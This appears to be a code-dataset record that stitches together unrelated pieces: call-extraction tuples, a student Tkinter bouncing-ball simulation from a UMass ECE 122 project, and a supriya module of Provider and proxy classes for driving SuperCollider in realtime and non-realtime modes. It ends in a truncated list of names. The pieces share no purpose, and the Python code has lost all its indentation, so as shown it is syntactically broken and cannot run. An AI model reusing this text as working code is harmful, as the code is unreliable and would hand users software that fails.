[((313, 329), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (323, 329), False, 'import json\n'), ((683, 707), 'json.dumps', 'json.dumps', (['saved_corpus'], {}), '(saved_corpus)\n', (693, 707), False, 'import json\n')]
|
"""
<NAME>
University of Massachusetts, Amherst
28 June 2019
Project 3
ECE 122
"""
from Mapping_for_Tkinter import Mapping_for_Tkinter
from tkinter import *
import math
import time
class Ball:
def __init__(self, x0, y0, v, theta, radius):
self.__x = x0
self.__y = y0
self.__v = v
self.__theta = theta
self.__radius = radius
def get_x(self):
return self.__x
def get_y(self):
return self.__y
def get_v(self):
return self.__v
def get_theta(self):
return self.__theta
def get_radius(self):
return self.__radius
def set_x(self, x):
self.__x = x
def set_y(self, y):
self.__y = y
def set_v(self, v):
self.__v = v
def set_theta(self, theta):
self.__theta = theta
class Frame:
def __init__(self, ball, mapping, canvas):
self.__ball = ball
self.__mapping = mapping
self.__canvas = canvas
self.__rebounds = 0
self.__last_pos = None
self.__circle = self.init_draw("blue")
def init_draw(self, color):
x = self.__ball.get_x()
y = self.__ball.get_y()
r = self.__ball.get_radius()
i = self.__mapping.get_i(x)
j = self.__mapping.get_j(y)
return self.__canvas.create_oval(i-r, j-r, i+r, j+r, fill=color)
def update_position(self):
v = self.__ball.get_v()
x = self.__ball.get_x()
y = self.__ball.get_y()
theta = self.__ball.get_theta()
self.__last_pos = (x, y)
if x > self.__mapping.get_xmax() or x < self.__mapping.get_xmin():
# ball has reached left or right side of frame; bounce (change angle)
theta = math.pi - theta
self.__rebounds += 1
if y > self.__mapping.get_ymax() or y < self.__mapping.get_ymin():
# ball has reached top or bottom of frame
theta = -theta
self.__rebounds += 1
self.__ball.set_theta(theta)
# Updates (x,y) coords based on given formulae
x += v * math.cos(theta)
y += v * math.sin(theta)
# Sets updated (x,y) coords
self.__ball.set_x(x)
self.__ball.set_y(y)
def update_canvas(self):
# move the ball
x = self.__ball.get_x()
y = self.__ball.get_y()
r = self.__ball.get_radius()
i = self.__mapping.get_i(x)
j = self.__mapping.get_j(y)
self.__canvas.coords(self.__circle, (i-r, j-r, i+r, j+r))
# draw the trail
i = self.__mapping.get_i(self.__last_pos[0])
j = self.__mapping.get_j(self.__last_pos[1])
self.__canvas.create_oval(i, j, i, j, fill='black')
def get_rebounds(self):
return self.__rebounds
def main():
coord_in = input("Enter xmin,xmax,ymin,ymax (return for default -300,300,-300,300): ")
info_in = input("Enter x0,y0,v,theta (return for default 0,0,70,30): ")
# Takes user input as type str, separates desired values, and assigns to variables
if coord_in == "":
xmin, xmax, ymin, ymax = -300, 300, -300, 300
else:
        xmin, xmax, ymin, ymax = map(float, coord_in.split(","))  # comma-separated, as prompted
if info_in == "":
x, y, v, theta = 0, 0, 70, (30 * math.pi / 180)
else:
        info = [float(x) for x in info_in.split(",")]  # comma-separated, as prompted
x, y, v, theta = info[0], info[1], info[2], (info[3] * math.pi / 180)
t_total = 0
radius = 4
width = 800
ball = Ball(x, y, v * .1, theta, radius)
m = Mapping_for_Tkinter(xmin, xmax, ymin, ymax, width)
window = Tk()
canvas = Canvas(window, width=m.get_width(), height=m.get_height(), bg="white")
canvas.pack()
frame = Frame(ball, m, canvas)
while t_total < 150:
time.sleep(.01)
frame.update_position()
frame.update_canvas()
window.update()
t_total += .1
frame.init_draw("red") # Draw red ball at simulation end
print("Total number of rebounds is: %s" % frame.get_rebounds())
window.mainloop()
if __name__ == "__main__":
main()
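# Example session (hypothetical values; inputs are comma-separated, matching
# the prompts in main()):
#
#   Enter xmin,xmax,ymin,ymax (return for default -300,300,-300,300): -200,200,-200,200
#   Enter x0,y0,v,theta (return for default 0,0,70,30): 0,0,50,45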
|
[
"Mapping_for_Tkinter.Mapping_for_Tkinter",
"math.cos",
"math.sin",
"time.sleep"
] |
[((3534, 3584), 'Mapping_for_Tkinter.Mapping_for_Tkinter', 'Mapping_for_Tkinter', (['xmin', 'xmax', 'ymin', 'ymax', 'width'], {}), '(xmin, xmax, ymin, ymax, width)\n', (3553, 3584), False, 'from Mapping_for_Tkinter import Mapping_for_Tkinter\n'), ((3776, 3792), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (3786, 3792), False, 'import time\n'), ((2087, 2102), 'math.cos', 'math.cos', (['theta'], {}), '(theta)\n', (2095, 2102), False, 'import math\n'), ((2120, 2135), 'math.sin', 'math.sin', (['theta'], {}), '(theta)\n', (2128, 2135), False, 'import math\n')]
|
import abc
import collections
import contextlib
import dataclasses
import pathlib
import re
import tempfile
from types import MappingProxyType
from typing import (
Any,
Callable,
Dict,
List,
Mapping,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
from uqbar.objects import new
import supriya.nonrealtime # noqa
import supriya.realtime # noqa
from supriya import commands, nonrealtime, realtime
from supriya.assets.synthdefs.default import default
from supriya.enums import AddAction, CalculationRate, ParameterRate
from supriya.nonrealtime import Session
from supriya.realtime import AsyncServer, BaseServer, Server
from supriya.synthdefs import SynthDef
# with provider.at(): proxy = provider.add_buffer(file_path=file_path)
# with provider.at(): proxy.free()
@dataclasses.dataclass(frozen=True)
class Proxy:
provider: "Provider"
@dataclasses.dataclass(frozen=True)
class BufferProxy:
provider: "Provider"
identifier: Union["supriya.nonrealtime.Buffer", int]
channel_count: Optional[int] = None
frame_count: Optional[int] = None
file_path: Optional[str] = None
starting_frame: Optional[int] = None
def __float__(self):
return float(int(self))
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def close(self):
pass
def free(self):
self.provider.free_buffer(self)
def normalize(self, new_maximum=1.0):
pass
def read(self, file_path, leave_open=False):
pass
def write(
self,
file_path,
frame_count=None,
header_format="aiff",
leave_open=False,
sample_format="int24",
starting_frame=None,
):
pass
def as_allocate_request(self):
kwargs = dict(buffer_id=int(self), frame_count=self.frame_count)
if self.file_path is None:
return commands.BufferAllocateRequest(
**kwargs, channel_count=self.channel_count
)
kwargs.update(file_path=self.file_path, starting_frame=self.starting_frame)
if self.channel_count is None:
return commands.BufferAllocateReadRequest(**kwargs)
return commands.BufferAllocateReadChannelRequest(
**kwargs, channel_indices=list(range(self.channel_count))
)
def as_free_request(self):
return commands.BufferFreeRequest(buffer_id=int(self))
@dataclasses.dataclass(frozen=True)
class OscCallbackProxy(Proxy):
provider: "Provider"
identifier: Any
def unregister(self):
self.provider.unregister_osc_callback(self)
@dataclasses.dataclass(frozen=True)
class BusProxy(Proxy):
calculation_rate: CalculationRate
provider: "Provider"
identifier: Union["supriya.nonrealtime.Bus", int]
def __float__(self):
return float(int(self))
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def set_(self, value):
self.provider.set_bus(self, value)
def free(self):
self.provider.free_bus(self)
@property
def map_symbol(self):
if self.calculation_rate == CalculationRate.AUDIO:
return f"a{int(self)}"
return f"c{int(self)}"
@dataclasses.dataclass(frozen=True)
class BusGroupProxy(Proxy):
calculation_rate: CalculationRate
channel_count: int
identifier: Union["supriya.nonrealtime.BusGroup", int]
provider: "Provider"
buses: Sequence["BusProxy"] = dataclasses.field(init=False)
def __post_init__(self):
if isinstance(self.identifier, int):
bus_identifiers = range(
self.identifier, self.identifier + self.channel_count
)
else:
bus_identifiers = self.identifier[:]
object.__setattr__(
self,
"buses",
tuple(
BusProxy(
calculation_rate=self.calculation_rate,
provider=self.provider,
identifier=bus_identifier,
)
for bus_identifier in bus_identifiers
),
)
def __float__(self):
return float(int(self))
def __getitem__(self, item):
return self.buses[item]
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def __len__(self):
return self.channel_count
def free(self):
self.provider.free_bus_group(self)
@dataclasses.dataclass(frozen=True)
class NodeProxy(Proxy):
identifier: Union["supriya.nonrealtime.Node", int]
provider: "Provider"
def __float__(self):
return float(int(self))
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def __setitem__(self, key, value):
self.provider.set_node(self, **{key: value})
def add_group(
self, *, add_action: int = AddAction.ADD_TO_HEAD, name: Optional[str] = None
) -> "GroupProxy":
return self.provider.add_group(add_action=add_action, target_node=self)
def add_synth(
self,
*,
synthdef: SynthDef = None,
add_action: int = AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> "SynthProxy":
return self.provider.add_synth(
add_action=add_action, synthdef=synthdef, target_node=self, **settings
)
def as_move_request(
self, add_action: AddAction, target_node: "NodeProxy"
) -> commands.MoveRequest:
request_classes: Dict[int, Type[commands.MoveRequest]] = {
AddAction.ADD_TO_HEAD: commands.GroupHeadRequest,
AddAction.ADD_TO_TAIL: commands.GroupTailRequest,
AddAction.ADD_BEFORE: commands.NodeBeforeRequest,
AddAction.ADD_AFTER: commands.NodeAfterRequest,
}
request_class: Type[commands.MoveRequest] = request_classes[add_action]
return request_class(
node_id_pairs=[request_class.NodeIdPair(int(self), int(target_node))]
)
def as_set_request(self, **settings):
coerced_settings = {}
for key, value in settings.items():
if isinstance(value, (BusProxy, BusGroupProxy)):
if value.calculation_rate == CalculationRate.AUDIO:
value = f"a{value.identifier}"
else:
value = f"c{value.identifier}"
coerced_settings[key] = value
return commands.NodeSetRequest(node_id=int(self), **coerced_settings)
def dispose(self):
self.provider.dispose(self)
def free(self):
self.provider.free_node(self)
def move(self, add_action: AddAction, target_node: "NodeProxy"):
self.provider.move_node(self, add_action, target_node)
@dataclasses.dataclass(frozen=True)
class GroupProxy(NodeProxy):
identifier: Union["supriya.nonrealtime.Node", int]
provider: "Provider"
def as_add_request(self, add_action, target_node):
return commands.GroupNewRequest(
items=[
commands.GroupNewRequest.Item(
node_id=int(self.identifier),
add_action=add_action,
target_node_id=int(target_node),
)
]
)
def as_free_request(self, force=False):
return commands.NodeFreeRequest(node_ids=[int(self)])
@dataclasses.dataclass(frozen=True)
class SynthProxy(NodeProxy):
identifier: Union["supriya.nonrealtime.Node", int]
provider: "Provider"
synthdef: SynthDef
settings: Dict[str, Union[float, BusGroupProxy]]
def as_add_request(self, add_action, target_node):
# TODO: Handle map symbols
# If arg is a bus proxy, and synth param is scalar, cast to int
# Elif arg is a bus proxy, and synth param not scalar, map
# Else cast to float
synthdef = self.synthdef or default
synthdef_kwargs = {}
for _, parameter in synthdef.indexed_parameters:
if parameter.name not in self.settings:
continue
value = self.settings[parameter.name]
if value == parameter.value:
continue
if parameter.parameter_rate == ParameterRate.SCALAR:
synthdef_kwargs[parameter.name] = float(value)
elif parameter.name in ("in_", "out"):
synthdef_kwargs[parameter.name] = float(value)
elif isinstance(value, (BusProxy, BusGroupProxy)):
synthdef_kwargs[parameter.name] = value.map_symbol
else:
synthdef_kwargs[parameter.name] = float(value)
return commands.SynthNewRequest(
node_id=int(self.identifier),
add_action=add_action,
target_node_id=int(target_node),
synthdef=synthdef,
**synthdef_kwargs,
)
def as_free_request(self, force=False):
if force or "gate" not in self.synthdef.parameters:
return commands.NodeFreeRequest(node_ids=[int(self)])
return commands.NodeSetRequest(node_id=int(self), gate=0)
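# Note on as_free_request above: when the synthdef defines a "gate" parameter,
# setting gate=0 asks the synth's envelope to release itself (the standard
# SuperCollider convention) rather than hard-freeing the node with /n_free.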
@dataclasses.dataclass(frozen=True)
class ProviderMoment:
provider: "Provider"
seconds: float
bus_settings: List[Tuple[BusProxy, float]] = dataclasses.field(default_factory=list)
buffer_additions: List[BufferProxy] = dataclasses.field(default_factory=list)
buffer_removals: List[BufferProxy] = dataclasses.field(default_factory=list)
node_reorderings: List[Tuple[NodeProxy, AddAction, NodeProxy]] = dataclasses.field(
default_factory=list
)
node_additions: List[Tuple[NodeProxy, AddAction, NodeProxy]] = dataclasses.field(
default_factory=list
)
node_removals: List[NodeProxy] = dataclasses.field(default_factory=list)
node_settings: List[
Tuple[NodeProxy, Dict[str, Union[float, BusGroupProxy]]]
] = dataclasses.field(default_factory=list)
wait: bool = dataclasses.field(default=False)
exit_stack: contextlib.ExitStack = dataclasses.field(
init=False, default_factory=contextlib.ExitStack, compare=False
)
def __postinit__(self):
self.exit_stack = contextlib.ExitStack()
async def __aenter__(self):
if self.provider.server and not isinstance(self.provider.server, AsyncServer):
raise RuntimeError(repr(self.provider.server))
return self._enter()
async def __aexit__(self, *args):
results = self._exit()
if not results:
return
timestamp, request_bundle, synthdefs = results
server = self.provider.server
# The underlying asyncio UDP transport will silently drop oversize packets
if len(request_bundle.to_datagram()) <= 8192:
if self.wait:
# If waiting, the original ProviderMoment timestamp can be ignored
await request_bundle.communicate_async(server=server, sync=True)
else:
server.send(request_bundle.to_osc())
else:
# If over the UDP packet limit, partition the message
requests = request_bundle.contents
# Always wait for SynthDefs to load.
if synthdefs:
synthdef_request = requests[0]
requests = synthdef_request.callback.contents or []
synthdef_request = new(synthdef_request, callback=None)
await synthdef_request.communicate_async(sync=True, server=server)
if self.wait:
# If waiting, the original ProviderMoment timestamp can be ignored
for bundle in commands.RequestBundle.partition(requests):
await bundle.communicate_async(server=server, sync=True)
else:
for bundle in commands.RequestBundle.partition(
requests, timestamp=timestamp
):
server.send(bundle.to_osc())
def __enter__(self):
if self.provider.session is not None:
self.exit_stack.enter_context(self.provider.session.at(self.seconds or 0))
if self.provider.server and not isinstance(self.provider.server, Server):
raise RuntimeError(repr(self.provider.server))
return self._enter()
def __exit__(self, *args):
results = self._exit()
if not results:
return
timestamp, request_bundle, synthdefs = results
try:
self.provider.server.send(request_bundle.to_osc())
except OSError:
requests = request_bundle.contents
if synthdefs:
synthdef_request = requests[0]
requests = synthdef_request.callback.contents or []
synthdef_request = new(synthdef_request, callback=None)
synthdef_request.communicate(sync=True, server=self.provider.server)
for bundle in commands.RequestBundle.partition(
requests, timestamp=timestamp
):
self.provider.server.send(bundle.to_osc())
def _enter(self):
self.provider._moments.append(self)
self.provider._counter[self.seconds] += 1
return self
def _exit(self):
self.exit_stack.close()
self.provider._moments.pop()
self.provider._counter[self.seconds] -= 1
if not self.provider.server:
return
elif self.provider._counter[self.seconds]:
return
requests = []
synthdefs = set()
new_nodes = set()
for buffer_proxy in self.buffer_additions:
requests.append(buffer_proxy.as_allocate_request())
for node_proxy, add_action, target_node in self.node_additions:
request = node_proxy.as_add_request(add_action, target_node)
if isinstance(request, commands.SynthNewRequest):
if request.synthdef not in self.provider.server:
synthdefs.add(request.synthdef)
requests.append(request)
new_nodes.add(node_proxy.identifier)
for node_proxy, add_action, target_node in self.node_reorderings:
requests.append(node_proxy.as_move_request(add_action, target_node))
for node_proxy, settings in self.node_settings:
requests.append(node_proxy.as_set_request(**settings))
for node_proxy in self.node_removals:
requests.append(
node_proxy.as_free_request(force=node_proxy.identifier in new_nodes)
)
for buffer_proxy in self.buffer_removals:
requests.append(buffer_proxy.as_free_request())
if self.bus_settings:
sorted_pairs = sorted(
dict(
(int(bus_proxy.identifier), value)
for bus_proxy, value in self.bus_settings
).items()
)
request = commands.ControlBusSetRequest(index_value_pairs=sorted_pairs)
requests.append(request)
if not requests:
return
timestamp = self.seconds
if timestamp is not None:
timestamp += self.provider._latency
if synthdefs:
request_bundle = commands.RequestBundle(
timestamp=timestamp,
contents=[
commands.SynthDefReceiveRequest(
synthdefs=sorted(synthdefs, key=lambda x: x.actual_name),
callback=commands.RequestBundle(contents=requests),
)
],
)
# check bundle size, write synthdefs to disk and do /d_load
if len(request_bundle.to_datagram(with_placeholders=True)) > 8192:
directory_path = pathlib.Path(tempfile.mkdtemp())
# directory_path = pathlib.Path("~/Desktop").expanduser()
for synthdef in synthdefs:
name = synthdef.anonymous_name
if synthdef.name:
name += "-" + re.sub(r"[^\w]", "-", synthdef.name)
file_name = "{}.scsyndef".format(name)
synthdef_path = directory_path / file_name
synthdef_path.write_bytes(synthdef.compile())
request_bundle = commands.RequestBundle(
timestamp=timestamp,
contents=[
supriya.commands.SynthDefLoadDirectoryRequest(
directory_path=directory_path,
callback=commands.RequestBundle(contents=requests),
)
],
)
else:
request_bundle = commands.RequestBundle(
timestamp=timestamp, contents=requests
)
for synthdef in synthdefs:
synthdef._register_with_local_server(server=self.provider.server)
return timestamp, request_bundle, synthdefs
class Provider(metaclass=abc.ABCMeta):
"""
Provides limited realtime/non-realtime compatibility layer.
"""
### INITIALIZER ###
def __init__(self, latency=0.1):
self._moments: List[ProviderMoment] = []
self._counter = collections.Counter()
self._server = None
self._session = None
self._latency = latency
self._annotation_map: Dict[Union["supriya.nonrealtime.Node", int], str] = {}
### PUBLIC METHODS ###
@abc.abstractmethod
def add_buffer(
self,
*,
channel_count: Optional[int] = None,
file_path: Optional[str] = None,
frame_count: Optional[int] = None,
starting_frame: Optional[int] = None,
) -> BufferProxy:
raise NotImplementedError
@abc.abstractmethod
def add_bus(self, calculation_rate=CalculationRate.CONTROL) -> BusProxy:
raise NotImplementedError
@abc.abstractmethod
def add_bus_group(
self, channel_count=1, calculation_rate=CalculationRate.CONTROL
) -> BusGroupProxy:
raise NotImplementedError
@abc.abstractmethod
def add_group(
self,
*,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
) -> GroupProxy:
raise NotImplementedError
@abc.abstractmethod
def add_synth(
self,
*,
synthdef: SynthDef = None,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> SynthProxy:
raise NotImplementedError
@abc.abstractmethod
def boot(self, **kwargs):
raise NotImplementedError
@abc.abstractmethod
def dispose(self, node_proxy: NodeProxy):
raise NotImplementedError
@abc.abstractmethod
def free_buffer(self, buffer_proxy):
raise NotImplementedError
@abc.abstractmethod
def free_bus(self, bus_proxy: BusProxy):
raise NotImplementedError
@abc.abstractmethod
def free_bus_group(self, bus_group_proxy: BusGroupProxy):
raise NotImplementedError
@abc.abstractmethod
def free_node(self, node_proxy: NodeProxy):
raise NotImplementedError
@abc.abstractmethod
def move_node(
self, node_proxy: NodeProxy, add_action: AddAction, target_node: NodeProxy
):
raise NotImplementedError
@abc.abstractmethod
def set_bus(self, bus_proxy: BusProxy, value: float):
raise NotImplementedError
@abc.abstractmethod
def set_node(self, node_proxy: NodeProxy, **settings):
raise NotImplementedError
def at(self, seconds=None, wait=False):
if self._moments and self._moments[-1].seconds == seconds:
provider_moment = self._moments[-1]
else:
provider_moment = ProviderMoment(provider=self, seconds=seconds, wait=wait)
return provider_moment
@classmethod
def from_context(cls, context, latency=0.1) -> "Provider":
if isinstance(context, Session):
return NonrealtimeProvider(context, latency=latency)
elif isinstance(context, BaseServer):
return RealtimeProvider(context, latency=latency)
raise ValueError("Unknown context")
@classmethod
def nonrealtime(cls) -> "NonrealtimeProvider":
session = Session()
return cast("NonrealtimeProvider", cls.from_context(session))
@abc.abstractmethod
def quit(self):
raise NotImplementedError
@classmethod
def realtime(
cls, scsynth_path=None, options=None, port=None, **kwargs
) -> "RealtimeProvider":
server = Server()
server.boot(port=port, scsynth_path=scsynth_path, options=options, **kwargs)
return cast("RealtimeProvider", cls.from_context(server))
@classmethod
async def realtime_async(
cls, scsynth_path=None, options=None, port=None, **kwargs
) -> "RealtimeProvider":
server = AsyncServer()
await server.boot(
port=port, scsynth_path=scsynth_path, options=options, **kwargs
)
return cast("RealtimeProvider", cls.from_context(server))
@abc.abstractmethod
def register_osc_callback(
self, pattern: Tuple[Union[str, float], ...], procedure: Callable
) -> OscCallbackProxy:
raise NotImplementedError
@abc.abstractmethod
def unregister_osc_callback(self, proxy: OscCallbackProxy):
raise NotImplementedError
### PUBLIC PROPERTIES ###
@property
def annotation_map(self) -> Mapping[Union["supriya.nonrealtime.Node", int], str]:
return MappingProxyType(self._annotation_map)
@property
def latency(self):
return self._latency
@property
def moment(self) -> Optional[ProviderMoment]:
if self._moments:
return self._moments[-1]
return None
@property
def server(self) -> Server:
return self._server
@property
def session(self) -> Session:
return self._session
class NonrealtimeProvider(Provider):
### INITIALIZER ###
def __init__(self, session, latency=0.1):
if not isinstance(session, Session):
raise ValueError(f"Expected session, got {session}")
Provider.__init__(self, latency=latency)
self._session = session
### SPECIAL METHODS ###
def __str__(self):
return f"<{type(self).__name__} {self._session!r}>"
### PRIVATE METHODS ###
def _resolve_target_node(self, target_node) -> nonrealtime.Node:
if target_node is None:
target_node = self.session.root_node
elif isinstance(target_node, NodeProxy):
target_node = target_node.identifier
return target_node
### PUBLIC METHODS ###
def add_buffer(
self,
*,
channel_count: Optional[int] = None,
file_path: Optional[str] = None,
frame_count: Optional[int] = None,
starting_frame: Optional[int] = None,
) -> BufferProxy:
if not self.moment:
raise ValueError("No current moment")
identifier = self.session.add_buffer(
channel_count=channel_count,
file_path=file_path,
frame_count=frame_count,
starting_frame=starting_frame,
)
return BufferProxy(
channel_count=channel_count,
file_path=file_path,
frame_count=frame_count,
identifier=identifier,
provider=self,
starting_frame=starting_frame,
)
def add_bus(self, calculation_rate=CalculationRate.CONTROL) -> BusProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
identifier = self.session.add_bus(calculation_rate=calculation_rate)
return BusProxy(
calculation_rate=calculation_rate, identifier=identifier, provider=self
)
def add_bus_group(
self, channel_count=1, calculation_rate=CalculationRate.CONTROL
) -> BusGroupProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
if channel_count < 1:
raise ValueError("Channel-count must be positive, non-zero integer")
identifier = self.session.add_bus_group(
bus_count=channel_count, calculation_rate=calculation_rate
)
return BusGroupProxy(
calculation_rate=calculation_rate,
channel_count=channel_count,
identifier=identifier,
provider=self,
)
def add_group(
self,
*,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
) -> GroupProxy:
if not self.moment:
raise ValueError("No current moment")
identifier = self._resolve_target_node(target_node).add_group(
add_action=add_action
)
proxy = GroupProxy(identifier=identifier, provider=self)
return proxy
def add_synth(
self,
*,
synthdef: SynthDef = None,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> SynthProxy:
if not self.moment:
raise ValueError("No current moment")
sanitized_settings = {}
for key, value in settings.items():
if isinstance(value, (BusProxy, BusGroupProxy)):
value = value.identifier
sanitized_settings[key] = value
identifier = self._resolve_target_node(target_node).add_synth(
add_action=add_action, synthdef=synthdef, **sanitized_settings
)
proxy = SynthProxy(
identifier=identifier,
provider=self,
synthdef=synthdef or default,
settings=settings,
)
return proxy
def free_buffer(self, buffer_: BufferProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def boot(self, **kwargs):
pass # no-op
def dispose(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_bus(self, bus: BusProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_bus_group(self, bus_group: BusGroupProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_node(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
cast(nonrealtime.Node, node_proxy.identifier).free()
def move_node(
self,
node_proxy: NodeProxy,
add_action: AddAction,
target_node: Union[NodeProxy, nonrealtime.Node],
):
if not self.moment:
raise ValueError("No current moment")
self._resolve_target_node(target_node).move_node(
node_proxy.identifier, add_action=add_action
)
def set_bus(self, bus_proxy: BusProxy, value: float):
if not self.moment:
raise ValueError("No current moment")
elif bus_proxy.calculation_rate != CalculationRate.CONTROL:
raise ValueError("Can only set control-rate buses")
cast(nonrealtime.Bus, bus_proxy.identifier).set_(value)
def set_node(self, node_proxy: NodeProxy, **settings):
if not self.moment:
raise ValueError("No current moment")
for key, value in settings.items():
if isinstance(value, (BusProxy, BusGroupProxy)):
value = value.identifier
cast(nonrealtime.Node, node_proxy.identifier)[key] = value
def quit(self):
pass # no-op
def register_osc_callback(
self, pattern: Tuple[Union[str, float], ...], procedure: Callable
) -> OscCallbackProxy:
return OscCallbackProxy(provider=self, identifier=None)
def unregister_osc_callback(self, proxy: OscCallbackProxy):
pass # no-op
class RealtimeProvider(Provider):
### INITIALIZER ###
def __init__(self, server, latency=0.1):
if not isinstance(server, BaseServer):
raise ValueError(f"Expected Server, got {server}")
Provider.__init__(self, latency=latency)
self._server = server
### SPECIAL METHODS ###
def __str__(self):
return f"<{type(self).__name__} {self._server!r}>"
### PRIVATE METHODS ###
def _resolve_target_node(self, target_node):
if target_node is None:
# TODO: Will this work with AsyncServer?
target_node = self.server.default_group
return target_node
### PUBLIC METHODS ###
def add_buffer(
self,
*,
channel_count: Optional[int] = None,
file_path: Optional[str] = None,
frame_count: Optional[int] = None,
starting_frame: Optional[int] = None,
) -> BufferProxy:
if not self.moment:
raise ValueError("No current moment")
identifier = self.server.buffer_allocator.allocate(1)
proxy = BufferProxy(
channel_count=channel_count,
file_path=file_path,
frame_count=frame_count,
identifier=identifier,
provider=self,
starting_frame=starting_frame,
)
self.moment.buffer_additions.append(proxy)
return proxy
def add_bus(self, calculation_rate=CalculationRate.CONTROL) -> BusProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
allocator = realtime.Bus._get_allocator(calculation_rate, server=self.server)
identifier = allocator.allocate(1)
return BusProxy(
calculation_rate=calculation_rate, identifier=identifier, provider=self
)
def add_bus_group(
self, channel_count=1, calculation_rate=CalculationRate.CONTROL
) -> BusGroupProxy:
if not self.moment:
raise ValueError("No current moment")
calculation_rate = CalculationRate.from_expr(calculation_rate)
if calculation_rate not in (CalculationRate.AUDIO, CalculationRate.CONTROL):
raise ValueError(f"Invalid calculation rate: {calculation_rate!r}")
if channel_count < 1:
raise ValueError("Channel-count must be positive, non-zero integer")
allocator = realtime.Bus._get_allocator(calculation_rate, server=self.server)
identifier = allocator.allocate(channel_count)
if identifier is None:
raise RuntimeError
return BusGroupProxy(
calculation_rate=calculation_rate,
channel_count=channel_count,
identifier=identifier,
provider=self,
)
def add_group(
self,
*,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
) -> GroupProxy:
if not self.moment:
raise ValueError("No current moment")
target_node = self._resolve_target_node(target_node)
identifier = self.server.node_id_allocator.allocate_node_id(1)
proxy = GroupProxy(identifier=identifier, provider=self)
self.moment.node_additions.append((proxy, add_action, target_node))
if name:
self._annotation_map[identifier] = name
return proxy
def add_synth(
self,
*,
synthdef: SynthDef = None,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> SynthProxy:
if not self.moment:
raise ValueError("No current moment")
target_node = self._resolve_target_node(target_node)
identifier = self.server.node_id_allocator.allocate_node_id(1)
proxy = SynthProxy(
identifier=identifier,
provider=self,
synthdef=synthdef or default,
settings=settings,
)
self.moment.node_additions.append((proxy, add_action, target_node))
if name:
self._annotation_map[identifier] = name
return proxy
def boot(self, **kwargs):
self.server.boot(**kwargs)
def dispose(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
return # This is currently a no-op
def free_buffer(self, buffer_: BufferProxy):
if not self.moment:
raise ValueError("No current moment")
self.moment.buffer_removals.append(buffer_)
def free_bus(self, bus_proxy: BusProxy):
if not self.moment:
raise ValueError("No current moment")
allocator = realtime.Bus._get_allocator(
bus_proxy.calculation_rate, server=self.server
)
allocator.free(cast(int, bus_proxy.identifier))
def free_bus_group(self, bus_group_proxy: BusGroupProxy):
if not self.moment:
raise ValueError("No current moment")
allocator = realtime.Bus._get_allocator(
bus_group_proxy.calculation_rate, server=self.server
)
allocator.free(cast(int, bus_group_proxy.identifier))
def free_node(self, node_proxy: NodeProxy):
if not self.moment:
raise ValueError("No current moment")
self.moment.node_removals.append(node_proxy)
self._annotation_map.pop(node_proxy.identifier, None)
def move_node(
self, node_proxy: NodeProxy, add_action: AddAction, target_node: NodeProxy
):
if not self.moment:
raise ValueError("No current moment")
target_node = self._resolve_target_node(target_node)
self.moment.node_reorderings.append((node_proxy, add_action, target_node))
def quit(self):
self.server.quit()
def set_bus(self, bus_proxy: BusProxy, value: float):
if not self.moment:
raise ValueError("No current moment")
elif bus_proxy.calculation_rate != CalculationRate.CONTROL:
raise ValueError("Can only set control-rate buses")
self.moment.bus_settings.append((bus_proxy, value))
def set_node(self, node_proxy: NodeProxy, **settings):
if not self.moment:
raise ValueError("No current moment")
self.moment.node_settings.append((node_proxy, settings))
def register_osc_callback(
self, pattern: Tuple[Union[str, float], ...], procedure: Callable
) -> OscCallbackProxy:
identifier = self.server.osc_protocol.register(
pattern=pattern, procedure=procedure
)
return OscCallbackProxy(provider=self, identifier=identifier)
def unregister_osc_callback(self, proxy: OscCallbackProxy):
self.server.osc_protocol.unregister(proxy.identifier)
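# Usage sketch (hedged: assumes a bootable scsynth on this machine; the calls
# follow the Provider API defined above, but the values are illustrative):
#
#   provider = Provider.realtime()
#   with provider.at():
#       group = provider.add_group()
#       synth = group.add_synth(frequency=440)
#   with provider.at():
#       synth.free()
#   provider.quit()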
|
[
"typing.cast",
"supriya.enums.CalculationRate.from_expr",
"supriya.commands.BufferAllocateRequest",
"contextlib.ExitStack",
"tempfile.mkdtemp",
"collections.Counter",
"re.sub",
"supriya.commands.ControlBusSetRequest",
"supriya.realtime.Bus._get_allocator",
"types.MappingProxyType",
"dataclasses.field",
"supriya.commands.RequestBundle.partition",
"supriya.commands.RequestBundle",
"dataclasses.dataclass",
"supriya.realtime.AsyncServer",
"supriya.realtime.Server",
"supriya.nonrealtime.Session",
